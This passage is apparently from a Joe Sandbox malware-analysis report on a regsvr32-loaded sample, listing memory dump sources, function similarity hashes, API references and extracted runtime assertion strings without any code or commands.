                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: 9ffd6248bbacf4a5a100e7e9ff324db06e5a9880a382f2bf8e894613036de3a7
                                                                  • Instruction ID: 30390dc8dfa7effce4ee69cd890f5c74b203157c3b0406973a780c6515499caf
                                                                  • Opcode Fuzzy Hash: 9ffd6248bbacf4a5a100e7e9ff324db06e5a9880a382f2bf8e894613036de3a7
                                                                  • Instruction Fuzzy Hash: B0124471908295CFCB25CF6CC8905ADFFB1AF56204B1DC699D8A56B793E334D940CBA0
                                                                  Strings
                                                                  • assertion failed: buf.len() >= maxlen, xrefs: 6C92D6C9
                                                                  • -+NaNinf00e00E0assertion failed: ndigits > 0, xrefs: 6C92D4AB, 6C92D819
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: -+NaNinf00e00E0assertion failed: ndigits > 0$assertion failed: buf.len() >= maxlen
                                                                  • API String ID: 0-2939795802
                                                                  • Opcode ID: 7b6dc00d2d7f62fa412915be49cf29412804173e542e6c203b50343609d37927
                                                                  • Instruction ID: 872eaf6fde09da9edcd75addf9e3adce6dc69ea65967f65cb286fd6d3c8a4ca2
                                                                  • Opcode Fuzzy Hash: 7b6dc00d2d7f62fa412915be49cf29412804173e542e6c203b50343609d37927
                                                                  • Instruction Fuzzy Hash: 66D18A729193408BD304CF19C48179ABBE5BFC8318F148A2EF8D8577A8D7B9D945CB86
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: e7151c537666865e6595d4079c1f208c3c689ae74a9ea064726b3261d3ade884
                                                                  • Instruction ID: 35191fbf1c5271b70e70d6a1377023e0bd102bcd2fa99e3d2db070f132ce0b34
                                                                  • Opcode Fuzzy Hash: e7151c537666865e6595d4079c1f208c3c689ae74a9ea064726b3261d3ade884
                                                                  • Instruction Fuzzy Hash: 9662B531618F498BEF69DF28C8856A973E1FB98714F14462DD88BC7251EB34F9438B81
                                                                  Strings
                                                                  • 0x0b00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19, xrefs: 6C93A68D, 6C93A7DD, 6C93A965, 6C93AB25, 6C93AD55
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0x0b00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19
                                                                  • API String ID: 0-4248292056
                                                                  • Opcode ID: b065f88257bbf051da1211489a5f22bd01e935affeeb0ad2002216c85dc71544
                                                                  • Instruction ID: 836fb199054fc8c5ee86dfdc110c9c37d0dd89ec4bfff993effe4a921f5984d1
                                                                  • Opcode Fuzzy Hash: b065f88257bbf051da1211489a5f22bd01e935affeeb0ad2002216c85dc71544
                                                                  • Instruction Fuzzy Hash: 7A529A71A042289FEB248FA4C851BFE7BF5EF51304F04817DD989AB6C2CB798949C791
                                                                  APIs
                                                                  • memcmp.MSVCRT(00000001,00000001,?), ref: 6C932A6F
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcmp
                                                                  • String ID:
                                                                  • API String ID: 1475443563-0
                                                                  • Opcode ID: b7033bc16d9f63f25abd9cc9053e4debb9fdf494d2f2bfde627f8b12c87ba1b5
                                                                  • Instruction ID: 6255e18ca6b9d4aab69f99399adae6d4d6788ea69e39363f115039c8d714e3fa
                                                                  • Opcode Fuzzy Hash: b7033bc16d9f63f25abd9cc9053e4debb9fdf494d2f2bfde627f8b12c87ba1b5
                                                                  • Instruction Fuzzy Hash: 92620671E0462A8FDB11CF78C8807AEBBB6BF9A304F159319E859B7741D731D9428B90
                                                                  Strings
                                                                  • CurrentBuildNumberCurrentMajorVersionNumber (), xrefs: 6C87E874
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CurrentBuildNumberCurrentMajorVersionNumber ()
                                                                  • API String ID: 0-3310863298
                                                                  • Opcode ID: 6698d000c09f388c0fbfd00423723615706a7dc3e14319de2b0053ce217ceab7
                                                                  • Instruction ID: 3ff68ac2fc1799df5f45fb066a10a903b225ab1b9db289c03375fa34e3ac09be
                                                                  • Opcode Fuzzy Hash: 6698d000c09f388c0fbfd00423723615706a7dc3e14319de2b0053ce217ceab7
                                                                  • Instruction Fuzzy Hash: 91F1C271E002198FDB34CFA9C5907EEBBB2FF89314F198529D855AB781E3749941CBA0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ?
                                                                  • API String ID: 0-1684325040
                                                                  • Opcode ID: a2102e5965dcb69561bb539519eab756d198fe10cbe65145c14382c6bf2622dc
                                                                  • Instruction ID: bbbc284d311f9410907fdb20ce56d2b61d013ca4021fa7ecdc46532e18b3f00d
                                                                  • Opcode Fuzzy Hash: a2102e5965dcb69561bb539519eab756d198fe10cbe65145c14382c6bf2622dc
                                                                  • Instruction Fuzzy Hash: 7CE127B1E052298FD720EF68C5907ADBFB2BF8F304F298A69C4656B752D7709841C790
                                                                  Strings
                                                                  • 0x0b00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19, xrefs: 6C93C20F, 6C93C415
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0x0b00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19
                                                                  • API String ID: 0-4248292056
                                                                  • Opcode ID: 622ef2235633c75d87cc31be9cdcb1d361b23cebf5524e78b7e5635194ce298b
                                                                  • Instruction ID: ce91f079726cc2add97602059353b402de3313e1c72f9b97286907940601e2f5
                                                                  • Opcode Fuzzy Hash: 622ef2235633c75d87cc31be9cdcb1d361b23cebf5524e78b7e5635194ce298b
                                                                  • Instruction Fuzzy Hash: 0AC19C32B042358FE7249A2CC8857FA77A6EF85710F14933AE88D9B7C5D639CA45C391
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ?
                                                                  • API String ID: 0-1684325040
                                                                  • Opcode ID: b1f897a1c2db203fc9172d613e6f1495ebea03d0bb11d6a64f03c338ac499f87
                                                                  • Instruction ID: c3a2bd8a934fc220409cb62ccf0916a9e23c4411b399bfe168309f52b232d0a2
                                                                  • Opcode Fuzzy Hash: b1f897a1c2db203fc9172d613e6f1495ebea03d0bb11d6a64f03c338ac499f87
                                                                  • Instruction Fuzzy Hash: 3BC12471E0121A8BDB24CFA8C9506EEF7B1FF45314F248729E825ABB80E775D941CB91
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(6C978E20,00000000,00000001,6C978E10,00000000), ref: 6C861B44
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID:
                                                                  • API String ID: 542301482-0
                                                                  • Opcode ID: 62ebbff50809526680d8be99985b2d1352853212512541dbdb4579ea46557dfd
                                                                  • Instruction ID: e5ea5c19a3a86b14fed89be56cd98cf5f1de2942fe72f1ccd1195d3ce5605297
                                                                  • Opcode Fuzzy Hash: 62ebbff50809526680d8be99985b2d1352853212512541dbdb4579ea46557dfd
                                                                  • Instruction Fuzzy Hash: D51136B0D0060AA7EB20CFAADD44BEFB3B8AF51308F108939D41466E02F775D54887E1
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00009F6C), ref: 0263AFB3
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 2c83123e9dfe7c134bcfb8798860b3e4b76d282f5c09fcb92c71eb0836ab73d7
                                                                  • Instruction ID: b797f22e7728b3b33d56c437cb639090b601e2dc3dcf4522b1616352d2815033
                                                                  • Opcode Fuzzy Hash: 2c83123e9dfe7c134bcfb8798860b3e4b76d282f5c09fcb92c71eb0836ab73d7
                                                                  • Instruction Fuzzy Hash: DF9002E9A911405BA71117B0580D50936D05F68A127C11854A0C7C4114DB5058956551
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: l)\%
                                                                  • API String ID: 0-975318231
                                                                  • Opcode ID: ca9a847b4f3db288acb7fd5dbf7504a9e9efd1eda35e5247aff6cb4fe1b157ee
                                                                  • Instruction ID: 69fa98216291b3a6d433ee95c5e42fb101bfc0f97e4343c28d081d27b447ce2a
                                                                  • Opcode Fuzzy Hash: ca9a847b4f3db288acb7fd5dbf7504a9e9efd1eda35e5247aff6cb4fe1b157ee
                                                                  • Instruction Fuzzy Hash: E4813A72E083119BD308CF65C89075FF7E2AFC8714F1ACA3EA89897244D7B4D8419A82
                                                                  Strings
                                                                  • -+NaNinf00e00E0assertion failed: ndigits > 0, xrefs: 6C92D819
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: -+NaNinf00e00E0assertion failed: ndigits > 0
                                                                  • API String ID: 2221118986-3557657957
                                                                  • Opcode ID: c1ddc88e18bc8352170657884a9207e4e737dfb642e75b5e3d316ba5b9852d1b
                                                                  • Instruction ID: 9680c217ec916417d2f5d772060341ea734f68577e8fca6c0cbd4ec4107691c9
                                                                  • Opcode Fuzzy Hash: c1ddc88e18bc8352170657884a9207e4e737dfb642e75b5e3d316ba5b9852d1b
                                                                  • Instruction Fuzzy Hash: 33619EB29193008BD300CE19C88175BB7E9EFC9318F548A2EF4E897794D7B9D945CB82
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8688d7a5e63681c8ba26b86f2aed978e8ec8f0a622854f98c2bc60acff6f6b90
                                                                  • Instruction ID: 39e5cd0dc1bdf30e03d7710dec1cf61e1ece4367a0d6876624e94815c7dd42be
                                                                  • Opcode Fuzzy Hash: 8688d7a5e63681c8ba26b86f2aed978e8ec8f0a622854f98c2bc60acff6f6b90
                                                                  • Instruction Fuzzy Hash: 1F429E72C11B588FCB11CF54C880ADAB7B5FF9A354F06469AE8097F622DB70E945CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3258a50e5650563d70db5156f58ea88c102a1120cd99d253f35d355558781531
                                                                  • Instruction ID: 13a395b2a4095e423e29841214ee634d99f4822f2b1fba27b6761566426c2c85
                                                                  • Opcode Fuzzy Hash: 3258a50e5650563d70db5156f58ea88c102a1120cd99d253f35d355558781531
                                                                  • Instruction Fuzzy Hash: C72236B4A00B059FDB24DF68C984AAABBF1FF48304F118A6DD85A9B751D730F942CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9ef32cea41392b6c269e894d3ebf8e47fbc880b5cc681ca769ed0986be4e5704
                                                                  • Instruction ID: bd8a7c6659de89f4f3c43e517fb5a9b1566226a7f9329c220351649aa2eab851
                                                                  • Opcode Fuzzy Hash: 9ef32cea41392b6c269e894d3ebf8e47fbc880b5cc681ca769ed0986be4e5704
                                                                  • Instruction Fuzzy Hash: 682259B0A00B05DFDB29CF69C590AAABBF1FF48304F248A6DD85A97755D730E941CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
                                                                  • Instruction ID: c2927590cec753e5ec479fdb0b05317197056962312c0a8fc0706200f239fccf
                                                                  • Opcode Fuzzy Hash: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
                                                                  • Instruction Fuzzy Hash: CBD16631718B498BEF68DF68D849AADB7E5FB58705F10422DD84BC3250DF34E9528B81
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                                  • Instruction ID: 1dccef8cb21e36b5386d73aac26a876969c809443c89d691966362e766a8156e
                                                                  • Opcode Fuzzy Hash: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                                  • Instruction Fuzzy Hash: F6D13D31518A488BDF59DF28C889AEAB7E1FF98310F14466DE84ACB155EF30E946CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                                  • Instruction ID: 2c99fc6a52e2593ece6c8e0f5f5e684088348905184981ab900f477660b42dad
                                                                  • Opcode Fuzzy Hash: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                                  • Instruction Fuzzy Hash: 9EB18430714A099BEF59EF28C8957B9B3D1FB98304F644169D84AC7295EB20FC47CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
